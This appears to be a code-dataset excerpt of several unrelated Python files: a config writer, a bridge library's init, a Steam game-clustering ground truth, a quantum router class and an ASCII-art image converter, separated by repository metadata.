for params in cls.SECTIONS.values(): # pragma: no cover
for param in params:
if name.lower() == param.name.lower():
return param
# unreachable #raise ValueError("%s is not a valid param" % name)
@classmethod
def _get_param_type(cls, name):
"""Return type of parameter of name"""
return cls._get_default_param(name).type
@classmethod
def _is_param(cls, name, section):
"""Return True if name is a valid param name in section.
"""
assert section in cls.SECTIONS
return any([name.lower() == param.name.lower() for param in cls.SECTIONS[section]])
def to_str(self, svconfig):
ret = []
for section in sorted(self.SECTIONS.keys()):
ret.append("[%s]" % section)
for param in self.SECTIONS[section]:
ret.extend(['# %s, type=%r' % (param.desc, param.type),
'%s=%s' % (param.name, getattr(svconfig, param.name))])
ret.append("")
return '\n'.join(ret)
def write(self, svconfig, writer):
"""Write cfg to output-file-stream writer.
"""
writer.write(self.to_str(svconfig))
def reset_cfg_nproc(svconfig, nproc):
"""Reset nproc in a cfg obj"""
svconfig.nproc = int(nproc)
svconfig.cfg_fn = None # also reset associated cfg_fn
def make_cfg_fn(svconfig, o_cfg_fn):
"""Reset self.cfg_fn to o_cfg_fn"""
if svconfig.cfg_fn is None:
with open(o_cfg_fn, 'w') as writer:
SVConfigManipulator().write(svconfig, writer)
else:
shutil.copy(svconfig.cfg_fn, o_cfg_fn)
svconfig.cfg_fn = o_cfg_fn
def get_config(cfg):
"""wrapper, converts either a cfg fn or a SVConfig obj to SVConfig obj"""
if isinstance(cfg, str):
cfg = SVConfig(cfg)
elif not isinstance(cfg, SVConfigData):
raise ValueError(
"cfg must be either SVConfigData obj or a config filename")
log.debug("config: %s", str(cfg))
return cfg
def get_config_and_tmp_dir(cfg, tmp_dir):
"""Return cfg object and tmp_dir.
If tmp_dir is None, use cfg.tmp_dir; otherwise, use tmp_dir
"""
cfg = get_config(cfg)
if tmp_dir is None:
return cfg, cfg.tmp_dir
else:
assert isinstance(tmp_dir, str)
return cfg, tmp_dir
| 2.171875
| 2
|
src/endplay/__init__.py
|
dominicprice/endplay
| 4
|
12777747
|
"""
Endplay - A bridge tools library with generating, analysing and scoring.
Released under the MIT licence (see the LICENCE file provided with this distribution)
"""
import endplay._dds as _dds
from endplay.dds import *
from endplay.dealer import *
from endplay.interact import *
from endplay.parsers import *
from endplay.evaluate import *
from endplay.types import *
from endplay.config import \
__version__, __version_info__, __author__, \
__buildtime__, suppress_unicode
| 1.210938
| 1
|
hard_coded_ground_truth.py
|
woctezuma/steam-descriptions
| 1
|
12777748
|
<gh_stars>1-10
# Objective: define a ground truth consisting of clusters of games set in the same fictional universe
import matplotlib.pyplot as plt
import steamspypi
def get_app_ids_which_app_name_contains(name_str='Half-Life'):
data_request = dict()
data_request['request'] = 'all'
data = steamspypi.download(data_request)
app_ids = sorted([data[d]['appid'] for d in data.keys()
if name_str in data[d]['name']])
return app_ids
def get_retrieval_ground_truth():
# Lists of appIDs:
# - first obtained with calls to get_app_ids_which_app_name_contains()
# - then refined manually
retrieval_ground_truth_as_list = [
[20, 440, 943490], # Team Fortress
[10, 80, 240, 730, 273110, 100], # Counter-Strike
[500, 550], # Left 4 Dead
[50, 70, 130, 220, 280, 320, 340, 360, 380, 420, 466270, 723390], # Half-Life
[24240, 218620], # PAYDAY
[400, 620, 104600, 247120, 684410, 659, 52003, 450390], # Portal
[12100, 12110, 12120, 12170, 12180, 12210, 12220, 271590], # Grand Theft Auto
[22320, 22330, 72850, 306130, 364470, 489830, 611670], # The Elder Scrolls
[3900, 3910, 3920, 7600, 8930, 16810, 65980, 244070, 244090, 282210, 289070, 327380, 327390, 327400, 50100,
34470, 34440, 34450, 3990], # Sid Meier's Civilization
[8955, 8980, 49520, 261640, 330830], # Borderlands
[219740, 322330], # Don't Starve
[15700, 15710, 15740, 15750, 314660], # Oddworld: Abe
[236870, 863550, 6850, 6860, 6900, 203140, 205930, 247430, 427820], # HITMAN
[346110, 407530, 529910], # ARK
[375180, 709010, 660120, 324760, 270880, 751660, 935730, 900020, 320310, 1020600, 285500, 258760, 232010,
932300, 273740, 494670, 451660, 601170, 273750, 286810, 273760, 227300, 374120, 302060, 286830, 847870, 601590,
889470], # Euro Truck Simulator
[319630, 532210, 554620], # Life is Strange
[7000, 8000, 8140, 203160, 224960, 224980, 225000, 225020, 225300, 225320, 233410, 391220,
750920], # Tomb Raider
[21600, 61500, 61510, 61520, 105450, 217750, 221380, 226840, 230070, 264120, 266840, 314970, 341150, 351480,
362740, 369080, 371710, 397770, 402880, 421060, 431700, 442500, 454600, 556300, 570970, 586080, 597970, 599060,
601520, 603850, 639300, 678970, 718850, 725870, 783590, 792930, 799890, 817390, 832770, 882110, 882410, 988480,
997480], # Age of Empires
[12530, 12690, 253710, 290730, 322920, 323240, 328670, 328940, 361370, 459940, 518790, 545920, 545930, 545940,
580930, 585080, 619330, 679190, 758470, 801080, 806230, 860670, 934550, 988340, 1029380, 437210, 455700,
500140, 513680], # theHunter
[20900, 20920, 292030, 303800, 499450, 973760, 544750], # The Witcher
[22300, 22370, 22380, 22490, 38400, 38410, 38420, 377160, 588430, 611660], # Fallout
[2620, 2630, 2640, 3020, 6810, 7940, 10090, 10180, 21980, 22340, 41700, 42700, 202970, 209160, 209650, 214630,
251390, 270130, 292730, 311210, 336060, 350330, 358360, 359620, 389470, 390660, 393080, 399810, 476600, 518790,
626630, 630670, 672680, 765770, 836260, 896840, 987790], # Call of Duty
[73010, 225420, 231140, 255710, 261940, 313010, 446010, 457600, 520680, 708280, 845440, 862110, 872730,
24780], # Cities
[57300, 239200, 359390], # Amnesia
[1250, 232090, 326960, 690810], # Killing Floor
[7670, 8850, 8870, 409710, 409720], # BioShock
[209080, 442080, 608800, 49800], # Guns of Icarus
[9480, 55230, 206420, 301910], # Saints Row
]
# Create a dictionary
retrieval_ground_truth = dict()
for cluster in retrieval_ground_truth_as_list:
for element in cluster:
retrieval_ground_truth[element] = set(cluster) - {element}
return retrieval_ground_truth
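# Illustrative example: for the Team Fortress cluster [20, 440, 943490] above,
# retrieval_ground_truth[440] == {20, 943490}; each appID maps to the other members
# of its own cluster.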
def compute_retrieval_score(query_app_ids, reference_app_id_counters, num_elements_displayed=10, verbose=True):
print('\nComputing retrieval score based on a setting in the same fictional universe.')
retrieval_ground_truth = get_retrieval_ground_truth()
retrieval_score = 0
for query_counter, query_app_id in enumerate(query_app_ids):
reference_app_id_counter = reference_app_id_counters[query_counter]
try:
current_retrieval_ground_truth = retrieval_ground_truth[query_app_id]
except KeyError:
continue
current_retrieval_score = 0
for rank, app_id in enumerate(reference_app_id_counter):
if app_id in current_retrieval_ground_truth:
if app_id != query_app_id:
current_retrieval_score += 1
if rank >= (num_elements_displayed - 1):
retrieval_score += current_retrieval_score
if verbose:
print('[appID={}] retrieval score = {}'.format(query_app_id, current_retrieval_score))
break
print('Total retrieval score = {}'.format(retrieval_score))
return retrieval_score
def plot_retrieval_scores(d):
# Input d is a dictionary which maps the number of sentence components removed to the total retrieval score.
d_max = max(d.values())
d_arg_max = [i for i in d.keys() if d[i] == d_max]
plt.plot(list(d.keys()), list(d.values()))
plt.scatter(d_arg_max, [d[i] for i in d_arg_max], color='red')
plt.xlabel('Number of sentence components removed')
plt.ylabel('Retrieval score')
plt.title('Influence of the removal of sentence components')
plt.grid()
plt.show()
return
if __name__ == '__main__':
app_ids = get_app_ids_which_app_name_contains(name_str='Half-Life')
print(app_ids)
| 2.8125
| 3
|
qpce/router.py
|
brunorijsman/quantum-path-computation-engine
| 0
|
12777749
|
"""Quantum Router."""
import collections
class Router:
# TODO: Remove this when we have more methods
# pylint:disable=too-few-public-methods
"""A quantum router.
A quantum router object represents a quantum router that is part of a quantum network. Quantum
routers are interconnected by quantum links."""
def __init__(self, network, name):
"""Initialize a quantum router.
Args:
network (Network): The network in which the router is created.
name (str): The name of quantum router; uniquely identifies the router within the
quantum network.
Raises:
AssertionError if there is already a router with the same name in the network."""
self.network = network
self.name = name
self._next_available_port = 0
self.links = collections.OrderedDict() # Link objects indexed by local port
network.add_router(self)
def add_link(self, link):
"""Add a link to the router. The link is attached to the next available port. The number of
that port is returned.
Args:
link (Link): The link to be attached.
Returns:
The port to which the link was attached.
        Raises:
            AssertionError if this router is not an end-point of the link."""
assert self in [link.router_1, link.router_2], \
f"Attempt to add link to router {self.name} which is not an end-point of the link"
port = self._next_available_port
self._next_available_port += 1
self.links[port] = link
return port
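    # Minimal usage sketch (assuming a Link object exposing router_1/router_2 end-points):
    # for routers r1, r2 in the same Network joined by such a link, r1.add_link(link)
    # returns port 0, and a second link attached to r1 would get port 1.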
| 3.5
| 4
|
ascii-art.py
|
guptaanmol184/ascii-art
| 1
|
12777750
|
<filename>ascii-art.py
#!/usr/bin/env python
from PIL import Image
from colorama import Fore, Back, Style, init
import os
import argparse
import subprocess
# resize to the size i want
def resize_image(im, max_width, max_height):
    im.thumbnail((max_width//3, max_height)) # divide by 3 -> we draw each pixel as 3 characters
return im
# convert image to 2d matrix
def get_image_matrix(im):
pixel_list = list(im.getdata())
pixel_matrix = [pixel_list[i: i+im.width] for i in range(0, len(pixel_list), im.width)]
return pixel_matrix
# convert 2d image matrix to brightness matrix
def get_intensity_matrix(pixel_matrix, method='average', invert=False):
if method == 'average':
intensity_matrix = [[ sum(pixel)//3 for pixel in row] for row in pixel_matrix]
elif method == 'lightness':
intensity_matrix = [[ (min(pixel)+max(pixel))//2 for pixel in row] for row in pixel_matrix]
elif method == 'luminosity':
intensity_matrix = [[ 0.21*pixel[0] + 0.72*pixel[1] + 0.07*pixel[2] for pixel in row] for row in pixel_matrix]
if invert:
return [[ (255-pixel) for pixel in row ] for row in intensity_matrix]
else:
return intensity_matrix
# characters in the increasing order of their brightness on the screen
def get_mapped_char(intensity):
b_string = "`^\",:;Il!i~+_-?][}{1)(|\\/tfjrxnuvczXYUJCLQ0OZmwqpdbkhao*#MW&8%B@$"
return b_string[int((intensity/256)*len(b_string))]
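# For example, intensity 0 maps to '`' (the dimmest glyph) and intensity 255 maps to '$'
# (the brightest), since the string above is ordered by on-screen brightness.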
# returns the 2d matrix representing the ascii image
def get_character_matrix(intensity_matrix):
return [[get_mapped_char(intensity_val) for intensity_val in row] for row in intensity_matrix ]
# COLORAMA AVAILABLE OPTIONS
# Fore: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
# Back: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
# Style: DIM, NORMAL, BRIGHT, RESET_ALL
def display_ascii_image(ascii_image_matrix, fgcolor='white'):
if fgcolor == 'black':
colorstr = Fore.BLACK
if fgcolor == 'red':
colorstr = Fore.RED
if fgcolor == 'green':
colorstr = Fore.GREEN
if fgcolor == 'yellow':
colorstr = Fore.YELLOW
if fgcolor == 'blue':
colorstr = Fore.BLUE
if fgcolor == 'magenta':
colorstr = Fore.MAGENTA
if fgcolor == 'cyan':
colorstr = Fore.CYAN
if fgcolor == 'white':
colorstr = Fore.WHITE
f = lambda x: x*3
# sorry for the cryptic print
print(*[ colorstr + ''.join([f(ascii_char) for ascii_char in row]) for row in ascii_image_matrix], sep='\n')
# return terminal to normal state
print(Style.RESET_ALL)
#for row in ascii_mat:
# for char in row:
# print(char*3, end='')
# print()
def display_rgb_ascii_image(ascii_image_matrix, pixel_matrix, threshold):
colorstr = ''
color_opts = [ Fore.RED, Fore.GREEN, Fore.BLUE ]
for char_row, pixel_row in zip(ascii_image_matrix, pixel_matrix):
for char, pixel in zip(char_row, pixel_row):
pixel = list(pixel)
max_value = max(pixel)
max_index = pixel.index(max_value)
pixel.remove(max_value)
            # we check whether the average of the other two channel values
            # is at most threshold * max_pixel_value;
            # if so, the max channel truly dominates even after thresholding
if sum(pixel)//2 <= (threshold)*max_value:
colorstr = color_opts[max_index]
else:
colorstr = Style.RESET_ALL
print(colorstr, char*3, end='', sep='')
print()
# return terminal to normal state
print(Style.RESET_ALL)
# argument parsing helper
def restricted_float(x):
x = float(x)
if x < 0.0 or x > 1.0:
raise argparse.ArgumentTypeError("{} not in range [0.0, 1.0]".format(x))
return x
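# For example, restricted_float("0.5") returns 0.5, while restricted_float("1.5") raises
# argparse.ArgumentTypeError("1.5 not in range [0.0, 1.0]").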
def main():
parser = argparse.ArgumentParser(description='Transform a 3 band JPG image to ascii art.')
parser.add_argument('image', help='The image to transform.')
parser.add_argument('-f', '--filter', choices=['average', 'lightness', 'luminosity'],
default='average', help='Choose the filter to use.' )
parser.add_argument('-c', '--color', choices=['black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white', 'rgb'],
default='white', help='Choose the color of the output.' )
parser.add_argument('-i', '--invert', action="store_true", help='Invert the image. Make more bright areas less bright and less, more.' )
parser.add_argument('-t', '--threshold', type=restricted_float, default=0.0,
                        help='Use this argument with color=\'rgb\' to control only highlighted pixels. Threshold is a float between 0 and 1.\nSet threshold as 1 to color with the dominating color. Default: 0.0.')
args = parser.parse_args()
# query terminal capabilities to set up max_height and max_width of the image
# if not('LINES' in os.environ or 'COLUMNS' in os.environ):
# # cannot get lines and columns, define default
# print('export LINES and COLUMNS environment variables before running this script if possible,'+
# 'or else we use predefined default values')
# columns = 680
# lines = 105
# else:
# print('Got values from env, lines:', os.environ['LINES'], ' columns:', os.environ['COLUMNS'])
# columns = int(os.environ['COLUMNS'])
# lines = int(os.environ['LINES'])
# this should work most of the time
lines, columns = map(int, subprocess.run(["stty", "size"], capture_output=True, text=True).stdout.strip().split())
im = Image.open(args.image)
print('Image successfully loaded.')
im = resize_image(im, columns, lines)
print('Image size after resize: {} x {} '.format(im.width, im.height))
# processing
im_mat = get_image_matrix(im)
intensity_mat = get_intensity_matrix(im_mat, args.filter, args.invert)
ascii_mat = get_character_matrix(intensity_mat)
if args.color == 'rgb':
display_rgb_ascii_image(ascii_mat, im_mat, args.threshold)
else:
display_ascii_image(ascii_mat, args.color)
if __name__ == '__main__':
init() # initialize colorama
main()
| 3.4375
| 3
|